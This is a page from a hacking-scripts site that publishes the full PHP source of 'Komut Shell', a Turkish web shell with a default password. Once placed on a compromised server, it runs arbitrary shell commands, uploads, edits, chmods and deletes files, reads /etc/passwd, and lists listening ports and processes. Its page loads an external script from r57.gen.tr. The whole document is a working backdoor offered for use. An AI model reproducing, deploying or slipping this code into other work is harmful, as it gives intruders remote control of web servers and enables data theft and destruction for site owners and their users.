HackingScripts

Hack Scripts for everybody

Komut Shell

28 Apr 2015

Komut Shell source code

~ by WebRooT

  1 <?php ?><?php
  2 session_start();
  3 error_reporting(0);
  4 $password = "webr00t"; //Change this to your password ;)
  5 $version = "0.7B";
  6 $functions = array('Ekrani Temizle' => 'ClearScreen()', 'Gecmisi Temizle' => 'ClearHistory()', 'Fonksiyon Bilgisi' => "runcommand('canirun','GET')", 'Server Bilgisi' => "runcommand('showinfo','GET')", '/etc/passwd Oku' => "runcommand('etcpasswdfile','GET')", 'Acik Portlar' => "runcommand('netstat -an | grep -i listen','GET')", 'Calisan Uygulamalar' => "runcommand('ps -aux','GET')",);
  7 $thisfile = basename(__FILE__);
  8 $style = '<style type="text/css">
  9 .cmdthing {
 10     border-top-width: 0px;
 11     font-weight: bold;
 12     border-left-width: 0px;
 13     font-size: 10px;
 14     border-left-color: #000000;
 15     background: #000000;
 16     border-bottom-width: 0px;
 17     border-bottom-color: #FFFFFF;
 18     color: #FFFFFF;
 19     border-top-color: #008000;
 20     font-family: verdana;
 21     border-right-width: 0px;
 22     border-right-color: #000000;
 23 }
 24 input,textarea {
 25     border-top-width: 1px;
 26     font-weight: bold;
 27     border-left-width: 1px;
 28     font-size: 10px;
 29     border-left-color: #FFFFFF;
 30     background: #000000;
 31     border-bottom-width: 1px;
 32     border-bottom-color: #FFFFFF;
 33     color: #FFFFFF;
 34     border-top-color: #FFFFFF;
 35     font-family: verdana;
 36     border-right-width: 1px;
 37     border-right-color: #FFFFFF;
 38 }
 39 A:hover {
 40 text-decoration: none;
 41 }
 42 
 43 
 44 table,td,div {
 45 border-collapse: collapse;
 46 border: 1px solid #FFFFFF;
 47 }
 48 body {
 49 color: #FFFFFF;
 50 font-family: verdana;
 51 }
 52 </style>';
 53 $sess = __FILE__ . $password;
 54 if (isset($_POST['p4ssw0rD'])) {
 55     if ($_POST['p4ssw0rD'] == $password) {
 56         $_SESSION[$sess] = $_POST['p4ssw0rD'];
 57     } else {
 58         die("Wrong password");
 59     }
 60 }
 61 if ($_SESSION[$sess] == $password) {
 62     if (isset($_SESSION['workdir'])) {
 63         if (file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) {
 64             chdir($_SESSION['workdir']);
 65         }
 66     }
 67     if (isset($_FILES['uploadedfile']['name'])) {
 68         $target_path = "./";
 69         $target_path = $target_path . basename($_FILES['uploadedfile']['name']);
 70         if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
 71         }
 72     }
 73     if (isset($_GET['runcmd'])) {
 74         $cmd = $_GET['runcmd'];
 75         print "<b>" . get_current_user() . "~# </b>" . htmlspecialchars($cmd) . "<br>";
 76         if ($cmd == "") {
 77             print "Empty Command..type \"shellhelp\" for some ehh...help";
 78         } elseif ($cmd == "upload") {
 79             print '<br>Uploading to: ' . realpath(".");
 80             if (is_writable(realpath("."))) {
 81                 print "<br><b>I can write to this directory</b>";
 82             } else {
 83                 print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
 84             }
 85         } elseif ((ereg("changeworkdir (.*)", $cmd, $file)) || (ereg("cd (.*)", $cmd, $file))) {
 86             if (file_exists($file[1]) && is_dir($file[1])) {
 87                 chdir($file[1]);
 88                 $_SESSION['workdir'] = $file[1];
 89                 print "Current directory changed to " . $file[1];
 90             } else {
 91                 print "Directory not found";
 92             }
 93         } elseif (ereg("editfile (.*)", $cmd, $file)) {
 94             if (file_exists($file[1]) && !is_dir($file[1])) {
 95                 print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
 96                 $contents = file($file[1]);
 97                 foreach ($contents as $line) {
 98                     print htmlspecialchars($line);
 99                 }
100                 print "</textarea><br><input size=80 type=text name=filetosave value=" . $file[1] . "><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
101             } else {
102                 print "File not found.";
103             }
104         } elseif (ereg("deletefile (.*)", $cmd, $file)) {
105             if (is_dir($file[1])) {
106                 if (rmdir($file[1])) {
107                     print "Directory succesfully deleted.";
108                 } else {
109                     print "Couldn't delete directory!";
110                 }
111             } else {
112                 if (unlink($file[1])) {
113                     print "File succesfully deleted.";
114                 } else {
115                     print "Couldn't delete file!";
116                 }
117             }
118         } elseif (strtolower($cmd) == "canirun") {
119             print "<br>";
120             if (function_exists(passthru)) {
121                 print "Passthru: <b><font color=green>Enabled</b></font><br>";
122             } else {
123                 print "Passthru: <b><font color=red>Disabled</b></font><br>";
124             }
125             if (function_exists(exec)) {
126                 print "Exec: <b><font color=green>Enabled</b></font><br>";
127             } else {
128                 print "Exec: <b><font color=red>Disabled</b></font><br>";
129             }
130             if (function_exists(system)) {
131                 print "System: <b><font color=green>Enabled</b></font><br>";
132             } else {
133                 print "System: <b><font color=red>Disabled</b></font><br>";
134             }
135             if (function_exists(shell_exec)) {
136                 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
137             } else {
138                 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
139             }
140             print "<br><br>";
141             if (ini_get('safe_mode')) {
142                 print "Safe Mode: <b><font color=red>Enabled</b></font>";
143             } else {
144                 print "Safe Mode: <b><font color=green>Disabled</b></font>";
145             }
146             print "<br><br><br>";
147             if (ini_get('open_basedir')) {
148                 print "Open_basedir: <b><font color=red>Enabled</b></font>";
149             } else {
150                 print "Open_basedir: <b><font color=green>Disabled</b></font>";
151             }
152         }
153         //About the shell
154         elseif (ereg("listdir (.*)", $cmd, $directory)) {
155             if (!file_exists($directory[1])) {
156                 die("Directory not found");
157             }
158             //Some variables
159             chdir($directory[1]);
160             $i = 0;
161             $f = 0;
162             $dirs = "";
163             $filez = "";
164             if (!ereg("/$", $directory[1])) //Does it end with a slash?
165             {
166                 $directory[1].= "/"; //If not, add one
167 
168             }
169             print "Listing directory: " . $directory[1] . "<br>";
170             print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
171             if ($handle = opendir($directory[1])) {
172                 while (false !== ($file = readdir($handle))) {
173                     if (is_dir($file)) {
174                         $dirs[$i] = $file;
175                         $i++;
176                     } else {
177                         $filez[$f] = $file;
178                         $f++;
179                     }
180                 }
181                 print "<td>";
182                 foreach ($dirs as $directory) {
183                     print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" . realpath($directory) . "');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir " . realpath($directory) . "','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir " . realpath($directory) . "','GET'); \">" . $directory . "</b><br>";
184                 }
185                 print "</td><td>";
186                 foreach ($filez as $file) {
187                     print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" . realpath($file) . "');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile " . realpath($file) . "','GET');\">" . $file . "</u><br>";
188                 }
189                 print "</td></table>";
190             }
191         } elseif (strtolower($cmd) == "about") {
192             print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
193         }
194         //Show info
195         elseif (strtolower($cmd) == "showinfo") {
196             if (function_exists(disk_free_space)) {
197                 $free = disk_free_space("/") / 1000000;
198             } else {
199                 $free = "N/A";
200             }
201             if (function_exists(disk_total_space)) {
202                 $total = trim(disk_total_space("/") / 1000000);
203             } else {
204                 $total = "N/A";
205             }
206             $path = realpath(".");
207             print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
208             if (function_exists(passthru)) {
209                 passthru("uname -a");
210             } else {
211                 print "Passthru is disabled :(";
212             }
213         }
214         //Read /etc/passwd
215         elseif (strtolower($cmd) == "etcpasswdfile") {
216             $pw = file('/etc/passwd/');
217             foreach ($pw as $line) {
218                 print $line;
219             }
220         }
221         //Execute any other command
222         else {
223             if (function_exists(passthru)) {
224                 passthru($cmd);
225             } else {
226                 if (function_exists(exec)) {
227                     exec("ls -la", $result);
228                     foreach ($result as $output) {
229                         print $output . "<br>";
230                     }
231                 } else {
232                     if (function_exists(system)) {
233                         system($cmd);
234                     } else {
235                         if (function_exists(shell_exec)) {
236                             print shell_exec($cmd);
237                         } else {
238                             print "Sorry, none of the command functions works.";
239                         }
240                     }
241                 }
242             }
243         }
244     } elseif (isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) {
245         $file = $_POST['filetosave'];
246         if (!is_writable($file)) {
247             if (!chmod($file, 0777)) {
248                 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
249 
250             }
251         }
252         $fh = fopen($file, 'w');
253         $dt = $_POST['filecontent'];
254         fwrite($fh, $dt);
255         fclose($fh);
256     } else {
257 ?>
258 <html>
259 <title>Komut Shell ~ <?php print getenv("HTTP_HOST"); ?> ~ by WebRooT</title>
260 <meta http-equiv="Content-Type" content="text/html; charset=windows-1254" />
261 <head>
262 <?php print $style; ?>
263 <SCRIPT TYPE="text/javascript">
264 function sf(){document.cmdform.command.focus();}
265 var outputcmd = "";
266 var cmdhistory = "";
267 function ClearScreen()
268 {
269     outputcmd = "";
270     document.getElementById('output').innerHTML = outputcmd;
271 }
272 
273 function ClearHistory()
274 {
275     cmdhistory = "";
276     document.getElementById('history').innerHTML = cmdhistory;
277 }
278 
279 function deletefile(file)
280 {
281     deleteit = window.confirm("Are you sure you want to delete
282 "+file+"?");
283     if(deleteit)
284     {
285         runcommand('deletefile ' + file,'GET');
286     }
287 }
288 
289 var http_request = false;
290 function makePOSTRequest(url, parameters) {
291   http_request = false;
292   if (window.XMLHttpRequest) {
293      http_request = new XMLHttpRequest();
294      if (http_request.overrideMimeType) {
295         http_request.overrideMimeType('text/html');
296      }
297   } else if (window.ActiveXObject) {
298      try {
299         http_request = new ActiveXObject("Msxml2.XMLHTTP");
300      } catch (e) {
301         try {
302            http_request = new ActiveXObject("Microsoft.XMLHTTP");
303         } catch (e) {}
304      }
305   }
306   if (!http_request) {
307      alert('Cannot create XMLHTTP instance');
308      return false;
309   }
310 
311 
312   http_request.open('POST', url, true);
313   http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
314   http_request.setRequestHeader("Content-length", parameters.length);
315   http_request.setRequestHeader("Connection", "close");
316   http_request.send(parameters);
317 }
318 
319 
320 function SaveFile()
321 {
322 var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
323                     "&filecontent=" + encodeURI( document.getElementById("area1").value );
324 makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
325 document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
326 }
327 
328 function runcommand(urltoopen,action,contenttosend){
329 cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
330 document.getElementById('history').innerHTML = cmdhistory;
331 if(urltoopen == "clear")
332 {
333 ClearScreen();
334 }
335     var ajaxRequest;
336     try{
337         ajaxRequest = new XMLHttpRequest();
338     } catch (e){
339         try{
340             ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
341         } catch (e) {
342             try{
343                 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
344             } catch (e){
345                 alert("Wicked error, nothing we can do about it...");
346                 return false;
347             }
348         }
349     }
350     ajaxRequest.onreadystatechange = function(){
351         if(ajaxRequest.readyState == 4){
352         outputcmd = "<pre>"  + outputcmd + ajaxRequest.responseText +"</pre>";
353             document.getElementById('output').innerHTML = outputcmd;
354             var objDiv = document.getElementById("output");
355             objDiv.scrollTop = objDiv.scrollHeight;
356         }
357     }
358     ajaxRequest.open(action, "?runcmd="+urltoopen , true);
359     if(action == "GET")
360     {
361     ajaxRequest.send(null);
362     }
363     document.cmdform.command.value='';
364     return false;
365 }
366 
367 function set_tab_html(newhtml)
368 {
369 document.getElementById('commandtab').innerHTML = newhtml;
370 }
371 
372 function set_tab(newtab)
373 {
374     if(newtab == "cmd")
375     {
376         newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
377     }
378     else if(newtab == "upload")
379     {
380         runcommand('upload','GET');
381         newhtml = '<font size=0><b>Sayfa Yenilenecek...</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Dosya se: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
382     }
383     else if(newtab == "workingdir")
384     {
385         <?php
386         $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
387         $pathparts = explode("/", realpath("."));
388         foreach ($pathparts as $folder) {
389             $folders.= $folder . "/";
390         }
391         $folders.= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\"  onclick=\"document.workdir.changeworkdir.value=\'" . dirname(__FILE__) . "\'>" . dirname(__FILE__) . "</i>";
392 ?>
393         newhtml = '<?php print $folders; ?>';
394     }
395     else if(newtab == "filebrowser")
396     {
397         newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
398         runcommand('listdir .','GET');
399     }
400     else if(newtab == "createfile")
401     {
402         newhtml = '<b>File Editor, under construction.</b>';
403         document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.') . "/" . rand(1000, 999999) . ".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
404 
405     }
406         document.getElementById('commandtab').innerHTML = newhtml;
407 }
408 </script>
409 </head>
410 <body bgcolor=black onload="sf();" vlink=white alink=white link=white>
411 <table border=1 width=100% height=100%>
412 <td width=15% valign=top>
413 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
414 <form name="extras"><br>
415 <center><b>Hizli Komutlar</b><br>
416 
417 <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
418 <?php
419         foreach ($functions as $name => $execute) {
420             print '&nbsp;<input type="button" value="' . $name . '" onclick="' . $execute . '"><br>';
421         }
422 ?>
423 
424 </center>
425 
426 </div>
427 </form>
428 <center><b>Komut Gecmisi</b><br></center>
429 <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
430 <br>
431 <center><b>Hakkinda</b><br></center>
432 <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
433 <br>
434 <b><font size=3>Komut Shell</b></font><br>by WebRooT
435 <br>
436 Version <?php print $version; ?>
437 </div>
438 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
439 </td>
440 <td width=70%>
441 <table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
442 <b style="cursor:crosshair" onclick="set_tab('cmd');">[Komut alistir]</b>
443 <b style="cursor:crosshair" onclick="set_tab('upload');">[Dosya Upload]</b>
444 <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Dizin Degistir]</b>
445 <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Dosya Yoneticisi]</b>
446 <b style="cursor:crosshair" onclick="set_tab('createfile');">[Dosya Olustur]</b>
447 
448 </font></td>
449 <tr>
450 <td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
451 
452 <tr>
453 <td  height=1% width=100% valign=top>
454 <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
455 &nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
456 <b>Komut Satiri</b>: <input type=text name=command class=cmdthing size=100%><br>
457 </form>
458 </div>
459 </td>
460 </table>
461 </td>
462 </table>
463 </body>
464 </html>
465 <?php
466     }
467 } else {
468     print "<center><table border=0  height=100%>
469 <td valign=middle>
470 <form action=" . basename(__FILE__) . " method=POST>Ltfen giris yapiniz. (sifre=webr00t)<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
471 </form>";
472 }
473 ?>